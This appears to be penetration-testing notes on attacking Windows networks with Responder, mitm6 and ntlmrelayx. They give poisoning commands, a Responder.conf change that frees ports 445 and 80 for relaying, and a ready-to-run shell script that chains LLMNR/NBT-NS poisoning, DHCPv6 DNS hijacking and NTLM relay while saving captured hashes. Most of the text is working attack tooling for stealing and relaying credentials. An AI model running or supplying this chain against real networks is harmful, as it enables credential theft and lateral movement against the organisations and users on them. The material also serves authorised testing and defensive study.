Secondary Categories: 02-Credential Access, 02-Lateral Movement
Responder
When performing an internal network penetration test I usually start by running Responder in Analyze Mode to see whether the legacy name-resolution protocols LLMNR and/or NBT-NS are still in use. Analyze Mode (-A) only listens and logs which hosts are broadcasting these requests; it does not answer them, so nothing is poisoned yet.
```bash
# Analyze Mode (listen only, no poisoning)
responder -I eth0 -A
# Begin poisoning requests
responder -I eth0
```
This can also be coupled with mitm6, which answers DHCPv6 requests and sets itself as the DNS server for Windows hosts (which prefer IPv6), so even more name lookups are poisoned.
Another great method is to combine Responder, mitm6 and ntlmrelayx to capture and relay credentials rather than only collecting hashes for offline cracking.
If LLMNR and NBT-NS poisoning works we can use other tools to further leverage this, but first we need to edit the Responder.conf file located at /usr/share/responder/Responder.conf.
Change SMB and HTTP from On to Off. Otherwise Responder itself binds ports 445 and 80 and captures the authentication, and ntlmrelayx cannot listen on those ports to relay it.
```ini
; /usr/share/responder/Responder.conf
SQL = On
SMB = Off   ; Off so ntlmrelayx can bind 445
Kerberos = On
FTP = On
POP = On
SMTP = On
IMAP = On
HTTP = Off  ; Off so ntlmrelayx can bind 80
HTTPS = On
DNS = On
LDAP = On
```
- It is optional, but highly recommended, to log captured hashes to a file in addition to whatever relay action ntlmrelayx performs, so nothing is lost if a relay attempt fails. Use the -of flag in ntlmrelayx; it takes a base output filename and ntlmrelayx adds suffixes for NTLMv1 and NTLMv2 hashes.
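The whole procedure (turn SMB and HTTP off in Responder.conf, verify it, then launch Responder, mitm6 and ntlmrelayx with -of) as one script. This is an added example written for these notes, not code from the Responder, mitm6 or impacket projects. The interface eth0, the domain corp.local and the targets.txt relay-target list are assumptions, not values from the page.

```bash
#!/bin/sh
# Added example, not from the original notes or from the Responder/impacket projects:
# prepare Responder.conf for relaying and launch the Responder + mitm6 + ntlmrelayx chain.
# Assumptions (not stated on the page): interface eth0, domain corp.local, and a
# targets.txt listing relay targets (hosts without SMB signing). All are placeholders.

CONF="${RESPONDER_CONF:-/usr/share/responder/Responder.conf}"
IFACE="${IFACE:-eth0}"
DOMAIN="${DOMAIN:-corp.local}"
TARGETS="${TARGETS:-targets.txt}"

# disable_servers <conf> <server>...: flip "SMB = On" style lines to Off in place.
# Only whole keys at line start are matched, so HTTP does not clobber HTTPS.
disable_servers() {
    conf="$1"; shift
    for svc in "$@"; do
        sed "s/^${svc}[[:space:]]*=[[:space:]]*On[[:space:]]*$/${svc} = Off/" "$conf" > "$conf.tmp" \
            && mv "$conf.tmp" "$conf"
    done
}

# servers_off <conf> <server>...: succeed only if every named server is Off.
# Run this before ntlmrelayx: if SMB or HTTP is still On, Responder wins the bind on 445/80
# and captures the hash instead of letting ntlmrelayx relay it.
servers_off() {
    conf="$1"; shift
    for svc in "$@"; do
        grep -Eq "^${svc}[[:space:]]*=[[:space:]]*Off[[:space:]]*$" "$conf" || return 1
    done
    return 0
}

# run_chain: the actual attack chain. Only executed when "run" is passed on the
# command line, so the file can be sourced on a box without the tools installed.
run_chain() {
    disable_servers "$CONF" SMB HTTP
    servers_off "$CONF" SMB HTTP || { echo "SMB/HTTP still On in $CONF" >&2; return 1; }

    # Responder poisons LLMNR/NBT-NS; with SMB/HTTP Off it leaves 445/80 to ntlmrelayx.
    responder -I "$IFACE" &
    # mitm6 answers DHCPv6 and becomes the DNS server for Windows hosts in the domain.
    mitm6 -d "$DOMAIN" -i "$IFACE" &
    # ntlmrelayx relays incoming NTLM auth to the targets. -6 also listens on IPv6 for the
    # mitm6 victims; -of writes every captured hash (NTLMv1/NTLMv2 suffixes are added)
    # so nothing is lost when a relay attempt fails.
    ntlmrelayx.py -tf "$TARGETS" -smb2support -6 -of hashes
}

if [ "${1:-}" = run ]; then
    run_chain
fi
```

Run it as `sh relay.sh run` on the testing host; without the `run` argument it only defines the functions, which is handy for checking a Responder.conf with `servers_off` before starting anything.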